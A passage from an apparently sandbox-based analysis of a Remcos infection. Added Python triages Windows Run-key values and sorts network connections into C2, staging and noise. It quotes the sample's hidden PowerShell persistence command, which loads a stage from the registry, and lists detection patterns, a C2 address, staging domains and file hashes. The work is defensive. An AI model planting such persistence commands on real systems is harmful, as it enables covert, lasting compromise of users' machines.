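# Constructed listing in `reg query` layout (4-space indent, 4-space column
# gaps). `ineffableness` is the value from this report; the other two are
# benign entries added for contrast.
REG_QUERY_OUTPUT = RUN_KEY + "\n" + r"""
    OneDrive    REG_SZ    "C:\Users\Admin\AppData\Local\Microsoft\OneDrive\OneDrive.exe" /background
    SecurityHealth    REG_EXPAND_SZ    %windir%\system32\SecurityHealthSystray.exe
    ineffableness    REG_EXPAND_SZ    %Disfoliage% -windowstyle 1 $Varetagelsen=(gp -Path 'HKCU:\Software\Aetheogamic\').Lerholdighedens;%Disfoliage% ($Varetagelsen)
"""

VALUE_LINE = re.compile(r"^ {4}(?P<name>.+?) {4}(?P<type>REG_[A-Z_]+) {4}(?P<data>.*)$")

# Environment variables normally present at logon (assumed list). Any other
# %VAR% in a Run value hides the real launcher behind a custom variable that
# the attacker must have planted in HKCU\Environment or the machine
# Environment key.
WELL_KNOWN_ENV = {
    "systemroot", "windir", "systemdrive", "programfiles", "programfiles(x86)",
    "programw6432", "commonprogramfiles", "programdata", "allusersprofile",
    "appdata", "localappdata", "userprofile", "public", "temp", "tmp",
    "homedrive", "homepath", "comspec",
}


def triage_run_value(value_type: str, data: str) -> list[str]:
    """Return sorted finding tags for one Run value; empty list means nothing odd."""
    findings = set()
    for var in re.findall(r"%([^%\s]+)%", data):
        if var.lower() not in WELL_KNOWN_ENV:
            findings.add(f"launcher-behind-custom-env-var:{var}")
    # A Run value normally holds a path plus switches. A PowerShell variable
    # assignment means script text is executed straight out of the key.
    if re.search(r"\$\w+\s*=", data):
        findings.add("powershell-script-in-run-value")
    # Next stage read from another registry value (gp = Get-ItemProperty).
    if re.search(r"(?i)\b(gp|get-itemproperty(value)?)\b[^;]*\bHK(CU|LM|EY_[A-Z_]+)\b", data):
        findings.add("payload-read-from-registry")
    # powershell.exe -windowstyle 1 == Hidden.
    if re.search(r"(?i)-w(indowstyle)?\s+(1|hidden)\b", data):
        findings.add("hidden-window")
    return sorted(findings)


def triage_reg_query(output: str) -> dict[str, list[str]]:
    """Parse `reg query` output and triage every value line found."""
    results = {}
    for line in output.splitlines():
        m = VALUE_LINE.match(line)
        if m:
            results[m["name"]] = triage_run_value(m["type"], m["data"])
    return results


if __name__ == "__main__":
    for name, tags in triage_reg_query(REG_QUERY_OUTPUT).items():
        print(f"{name:16} {'OK' if not tags else ', '.join(tags)}")
```

On the constructed listing only `ineffableness` is flagged, with all four tags. The custom-variable tag is the one to follow up first: until %Disfoliage% is resolved, the binary that actually runs at logon is unknown, and deleting the Run value alone leaves the staged script in HKCU\Software\Aetheogamic in place.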

Network

Country Destination Domain Proto
US 8.8.8.8:53 www.seventools.de udp
DE 217.160.0.59:443 www.seventools.de tcp
US 8.8.8.8:53 196.249.167.52.in-addr.arpa udp
US 8.8.8.8:53 59.0.160.217.in-addr.arpa udp
US 8.8.8.8:53 79.190.18.2.in-addr.arpa udp
US 8.8.8.8:53 136.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 217.106.137.52.in-addr.arpa udp
US 8.8.8.8:53 www.campingplatz-goldbergersee.de udp
FR 92.205.55.123:443 www.campingplatz-goldbergersee.de tcp
US 8.8.8.8:53 ocsp.starfieldtech.com udp
US 192.124.249.36:80 ocsp.starfieldtech.com tcp
US 8.8.8.8:53 123.55.205.92.in-addr.arpa udp
US 8.8.8.8:53 36.249.124.192.in-addr.arpa udp
US 8.8.8.8:53 www.pkwankauf.nrw udp
DE 217.160.0.183:443 www.pkwankauf.nrw tcp
US 8.8.8.8:53 23.149.64.172.in-addr.arpa udp
US 8.8.8.8:53 183.0.160.217.in-addr.arpa udp
US 8.8.8.8:53 233.38.18.104.in-addr.arpa udp
US 8.8.8.8:53 www.tla-autos.com udp
US 8.8.8.8:53 50.23.12.20.in-addr.arpa udp
BG 45.88.88.33:9945 www.tla-autos.com tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 241.42.69.40.in-addr.arpa udp
US 8.8.8.8:53 33.88.88.45.in-addr.arpa udp
US 8.8.8.8:53 50.33.237.178.in-addr.arpa udp
US 8.8.8.8:53 99.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 43.58.199.20.in-addr.arpa udp
US 8.8.8.8:53 31.243.111.52.in-addr.arpa udp
US 8.8.8.8:53 102.209.201.84.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 8.8.8.8:53 10.27.171.150.in-addr.arpa udp
US 8.8.8.8:53 95.16.208.104.in-addr.arpa udp
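Most rows in the table above are resolver and operating-system background traffic rather than sample behaviour: the in-addr.arpa rows are reverse lookups of the peers the sandbox talked to, and tse1.mm.bing.net is Windows 10 background traffic. What remains is the PowerShell stage's HTTPS fetches from three web hosts, the OCSP check those TLS handshakes trigger, a lookup of geoplugin.net (the geolocation service Remcos is known to query on start-up), and a TCP connection to 45.88.88.33 on port 9945 via www.tla-autos.com, which is the most likely Remcos command-and-control connection and the one worth blocking outright. The Python below is an added example for this page, not sandbox output, that sorts the table into those buckets. Its input is a constructed subset of the rows above, and the noise suffix list is an assumption to be tuned per environment.

```python
from collections import Counter

# Added example for this report; not part of the sandbox output.
# Separates sandbox/OS noise in the Network table from connections worth
# acting on.

# Constructed subset of the behavioral2 Network table above, same layout:
# Country Destination Domain Proto
NETWORK_TABLE = """\
US 8.8.8.8:53 www.seventools.de udp
DE 217.160.0.59:443 www.seventools.de tcp
US 8.8.8.8:53 59.0.160.217.in-addr.arpa udp
US 8.8.8.8:53 www.campingplatz-goldbergersee.de udp
FR 92.205.55.123:443 www.campingplatz-goldbergersee.de tcp
US 8.8.8.8:53 ocsp.starfieldtech.com udp
US 192.124.249.36:80 ocsp.starfieldtech.com tcp
US 8.8.8.8:53 www.pkwankauf.nrw udp
DE 217.160.0.183:443 www.pkwankauf.nrw tcp
US 8.8.8.8:53 www.tla-autos.com udp
BG 45.88.88.33:9945 www.tla-autos.com tcp
US 8.8.8.8:53 geoplugin.net udp
NL 178.237.33.50:80 geoplugin.net tcp
US 8.8.8.8:53 33.88.88.45.in-addr.arpa udp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
"""

# Assumed list of Windows background destinations; extend for your estate.
OS_NOISE_SUFFIXES = (".bing.net", ".microsoft.com", ".windowsupdate.com", ".msftconnecttest.com")


def parse(table: str) -> list[tuple[str, str, int, str, str]]:
    """Rows as (country, ip, port, domain, proto); malformed lines are skipped."""
    rows = []
    for line in table.splitlines():
        parts = line.split()
        if len(parts) != 4:
            continue
        country, dest, domain, proto = parts
        ip, port = dest.rsplit(":", 1)
        rows.append((country, ip, int(port), domain, proto))
    return rows


def classify(country: str, ip: str, port: int, domain: str, proto: str) -> str:
    if domain.endswith(".in-addr.arpa"):
        return "ptr-noise"          # sandbox resolver reverse-looking-up peers
    if proto == "udp" and port == 53:
        return "dns"                # forward lookup; the tcp row carries the mapping
    if domain.endswith(OS_NOISE_SUFFIXES):
        return "os-noise"
    if domain.startswith("ocsp."):
        return "ocsp"               # revocation check caused by the HTTPS fetches
    if domain == "geoplugin.net":
        return "geolocation-check"  # Remcos queries this service at start-up
    if proto == "tcp" and port not in (80, 443):
        return "c2-candidate"       # non-web port from a script that just fetched files
    return "staging-candidate"      # web hosts contacted before the RAT connection


def summarize(table: str) -> dict:
    buckets = {"c2": [], "staging": [], "geolocation": [], "ocsp": []}
    bucket_of = {"c2-candidate": "c2", "staging-candidate": "staging",
                 "geolocation-check": "geolocation", "ocsp": "ocsp"}
    noise, seen = Counter(), set()
    for country, ip, port, domain, proto in parse(table):
        kind = classify(country, ip, port, domain, proto)
        if kind in ("ptr-noise", "dns", "os-noise"):
            noise[kind] += 1
            continue
        key = (domain, ip, port, country)
        if key not in seen:            # bing-style repeats collapse to one entry
            seen.add(key)
            buckets[bucket_of[kind]].append(key)
    buckets["noise"] = dict(noise)
    return buckets


def indicators(summary: dict) -> dict[str, list[str]]:
    """C2 goes straight to a blocklist; staging hosts look like ordinary web
    sites that may be compromised, so they are queued for review instead."""
    block = {f"{ip}:{port}" for _, ip, port, _ in summary["c2"]} | {d for d, *_ in summary["c2"]}
    review = {d for d, *_ in summary["staging"]}
    return {"block": sorted(block), "review": sorted(review)}


if __name__ == "__main__":
    s = summarize(NETWORK_TABLE)
    for bucket in ("c2", "geolocation", "staging", "ocsp"):
        print(bucket, s[bucket])
    print("noise", s["noise"])
    print(indicators(s))
```

The staging hosts should be reviewed rather than blocked blindly: the decoded `$Medsster` list from the first stage gives the exact URLs, which is the right granularity for blocking if those sites turn out to be legitimate but compromised.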

Files

memory/2804-0-0x00007FFA367A3000-0x00007FFA367A5000-memory.dmp

memory/2804-1-0x0000017BA0010000-0x0000017BA0032000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_ai1g2wb3.vbn.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

memory/2804-11-0x00007FFA367A0000-0x00007FFA37261000-memory.dmp

memory/2804-12-0x00007FFA367A0000-0x00007FFA37261000-memory.dmp

memory/2804-15-0x00007FFA367A0000-0x00007FFA37261000-memory.dmp

memory/2804-18-0x00007FFA367A0000-0x00007FFA37261000-memory.dmp

memory/3540-19-0x0000000002600000-0x0000000002636000-memory.dmp

memory/3540-20-0x00000000050E0000-0x0000000005708000-memory.dmp

memory/3540-21-0x0000000004FE0000-0x0000000005002000-memory.dmp

memory/3540-23-0x0000000005930000-0x0000000005996000-memory.dmp

memory/3540-22-0x00000000058C0000-0x0000000005926000-memory.dmp

memory/3540-33-0x0000000005B80000-0x0000000005ED4000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

MD5 d336b18e0e02e045650ac4f24c7ecaa7
SHA1 87ce962bb3aa89fc06d5eb54f1a225ae76225b1c
SHA256 87e250ac493525f87051f19207d735b28aa827d025f2865ffc40ba775db9fc27
SHA512 e538e4ecf771db02745061f804a0db31f59359f32195b4f8c276054779509eaea63665adf6fedbb1953fa14eb471181eb085880341c7368330d8c3a26605bb18

memory/3540-35-0x0000000005FA0000-0x0000000005FBE000-memory.dmp

memory/3540-36-0x0000000005FF0000-0x000000000603C000-memory.dmp

memory/3540-37-0x0000000007740000-0x0000000007DBA000-memory.dmp

memory/3540-38-0x0000000006530000-0x000000000654A000-memory.dmp

memory/3540-39-0x00000000070C0000-0x0000000007156000-memory.dmp

memory/3540-40-0x0000000006FB0000-0x0000000006FD2000-memory.dmp

memory/3540-41-0x0000000007DC0000-0x0000000008364000-memory.dmp

C:\Users\Admin\AppData\Roaming\Udskriftssiders.boe

MD5 a66871827ec32000db2ab1efb66b2438
SHA1 629ca79946fd964665568b28869476f8d691916f
SHA256 b08a2437ae0a2ebfc9d15f851d4c422becb7280614dfab150e6be501c481f1bc
SHA512 7cd0683ba79a1f42a66eac2d5c2ba04d0b7d4adaa52a2f3e18896803663cb1e7433867bf0e7c8a04397786117d82d24fcca4ed3874382065e045b581230efcc4

memory/3540-43-0x0000000008370000-0x00000000092C9000-memory.dmp

memory/3540-51-0x00000000229E0000-0x0000000023C34000-memory.dmp

memory/3540-58-0x00000000229E0000-0x0000000023C34000-memory.dmp